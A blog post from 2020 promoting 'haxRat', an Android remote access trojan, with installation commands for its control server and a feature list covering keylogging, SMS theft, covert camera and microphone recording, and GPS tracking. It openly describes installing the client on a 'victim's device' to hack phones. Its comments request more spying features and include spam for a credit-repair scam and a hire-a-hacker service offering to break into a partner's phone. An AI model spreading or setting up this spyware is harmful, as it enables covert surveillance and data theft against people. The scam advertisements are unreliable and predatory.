Monday, 29 June 2020

Install HaxRat In Termux Or Kali Linux


Hey guys so again welcome to my website and today I would like to introduce my new project haxRat ( A Android RAT ) with cool features.

Key features

  • GPS Logging
  • ScreenShot capture
  • Screen recording
  • Rear Camera Recorder
  • Front camera recorder
  • Device Lock
  • Microphone Recording
  • SMS capture
  • SMS send
  • Notification Access ( Including whatsapp instagram or more )
  • View Contacts
  • Call Logs
  • Live Clipboard capture
  • File explorer and downloader
  • List of installed apps on device


  • Call Blocker
  • Contact adder
  • Call recording
  • Keylogger
  • You can request your own ;)
Well so let's come to the installation process 


There are two ways to install it 
  1. Using TermuxBlacK ( Click Me To Install )
  2. Manually from GitHub

Using TermuxBlacK 

If you are Termux Black user then you can install haxRat by simple apt command 

apt update && apt install haxrat

Manually From GitHub

Ok so now if you don't want to install Termuxblack or you don't have TermuX and want to install it in Kali Linux or Ubuntu so this section is for you :)
  • First clone the repository 
git clone
  • Install Java 8
sudo apt install openjdk-8-jre 
  • Install NodeJs CLICK HERE
  • Now goto server directory of haxRat 
cd haxRat/server
  • Install all node dependencies
npm install
  • Now you can run haxRat server
node index.js
  • Navigate in browser to

Ok so now you will see a login panel just like below

Default Username : admin
Default password : CLICK ME TO GET PASSWORD

OK so after login you will see a user interface just like this

 you will not see any online devices in list but don't worry. You will have to first create haxRat client app to install in victim's device.

I am not going to write about how to make app and how to install HaxRat in victim's device because i already made videos about all those topics which are required and necessary to install & setup haxRat server & haxRat client to hack any android device :)

Here is list of all must watch videos 

Setup haxRat for first time CLICK ME
Setup L3MON with PORTMAP to hack devices on WAN ( wide area network ) CLICK ME ( you can follow same video for haxRat also )

If You Enjoyed This, Take 5 Seconds To Share It


  1. Kali Linux is only on heading. BTW good article.

  2. Hey! You need to fix clipboard log, wifi log and microphone recording for Android 10. The thing MUST be added for sure is streaming audio and video. In the info tab you can add information about the currently connected wifi network (if connected), information about your mobile operator and statuses for whether your location, internet, wifi enabled. You can also add an account scanner on your device. The newer android has permissions to control system settings so you can make a menu to enable/disable WiFi remotely. The file manager should be able to download several files at once. A media explorer that only shows videos, photos and sound files would also be useful.

  3. When we click on the link to get the default password the link is redirected to the YouTube video to get the password. How to get the default password.

  4. Sir Please haxrat ma
    Call Blocker
    Contact adder
    Call recording
    Battery Info
    System info
    reboot, power off
    factory data reset
    ka features add kar dejia please please please sir

  5. Error when make Apk Builder :
    root@kali:/home/zelly/Tools/haxRat/server# node index.js
    ERROR Build Failed - Build Command Failed - Command failed: java -jar "/home/zelly/Tools/haxRat/server/app/factory/apktool.jar" b "/home/zelly/Tools/haxRat/server/app/factory/decompiled" -o "/home/zelly/Tools/haxRat/server/assets/webpublic/build.apk"
    brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_8129676169928973938.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 24, --version-code, 1, --version-name, 1.0-beta, --no-version-vectors, -F, /tmp/APKTOOL4350336877528530722.tmp, -0, resources.arsc, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /home/zelly/Tools/haxRat/server/app/factory/decompiled/res, -M, /home/zelly/Tools/haxRat/server/app/factory/decompiled/AndroidManifest.xml]

  6. I am totally amazed at how LANX CREDIT SOLUTION were able to complete my job in 10 days. I read reviews about them online. people were saying good things about them and how they helped them fixed their credit score and also cleaned up their report. I contacted them via their email, LANXCREDITSOLUTION@GMAIL.COMand later called them with (310) 879 2541 to know how the process works and what’s obtainable because I was ready to purchase a home but my credit was bad and my score 543. I had some charge offs, lots of student loans and late payments and needed a quick repair. Ten days after we got started, my score increased to 798 and the charge offs, loans, late payment removed. There is so much to be thankful for.

  7. Sir How to delet Offline Devices ?

    Sir When we install and delet the virus the device still show in online section or in offline section if i install the virus in the same android again these will add the se device and it got double .
    So tell me how to delet the offline devices ?

    [⏱️ 2min Read]
    �� Hiring a professional hacker has been one of the world's most technical valued navigating information.
    •MOBILE PHONE HACKS.(Catching A Cheating Spouse).
    High prolific information and Priviledges comes rare as it has been understood that what people do not see, they will never know. The affirmative ability to convey a profitable information Systematically is the majoy factor to success.
    Welcome to the Global KOS hacking agency where every request on hacking related issues are fixed within a short period of time.
    When you wonder “which hacking company should I hire, the first aspect that should concern you is Sincerity. Secondly, Rapid response. Clearly, you want to embark for services that povides swift response. With our astonishing Hackers, you will be glad to find out that our services Implies precision and action.
    This post is definitely for those who are willing to turn their lives around for the better, either financial-wise, relationship-wise or businesses.
    However, the manual Operation of this hackers is to potentially deploy a distinguished hacking techniques to penetrating computers.
    If your shoe fits in any of the services below, you will be assigned to a designated professional hacker who is systematically known for operating on a dark web V-link protocol.
    Providing value added services to clients as a hacker has been our sustaining goal.
    Are you faced with cyber challenges like
    ��Recovery of lost funds:✅(BITCOIN INVESTMENTS, BINARY OPTIONS, LOAN AND TRADING FOREX WITH FORGERY BROKERS.) ��️I would try my possible best to shortly explain this in particular.
    This shocking study points to one harsh reality we all face today. It saddens our mind when client expresses annoyance or dissatisfaction of unethical behaviours of scammers. We have striven to make tenacious efforts to help those who are victims of this flees get off their traumatic feeling of loss. The cyber security technique used to retrieving back the victims stolen funds is the application of a diverse intercall XX breacher software enables you track the data location of a scammer. Extracting every informations on the con database. Every information required by the Global KOS would be used to tracking every transaction, time and location of the scammer. This is acheived using the systematic courier tracking base method•
    And also, there are secret cyber infiltrators called brokers and doom. The particular system used by this scammers permeates them to manupulate targets digital trading system or monetary fund based accounts. Strictly using a dark web rob to diverting successful trades into a negative outcome. This process bends to thier advantage while investors results to losing massive amount of money. An act of gaining access to an organization or databased system to cause damages. We have worked so hard to ensure our services gives you a 100% trading success to recover all your losses•
    �� HACKING A MOBILE PHONE:.✅ Do you think you are being cheated on? Curious to know what your lover is up to online? This type of hack helps you track every movement of your cheater as we are bent on helping you gain full remote access into the cheater's mobile phone using a Trojan breach cracking system to penetrate their social media platforms like Facebook, whatsapp, snapchat etc.
    The company is large enough to provide comprehensive range of services such as•
    Our strength is based on the ability to help fix cyber problems by bringing together active cyber hacking professionals in the GlobalkOS to work with.
    ®Global KOS™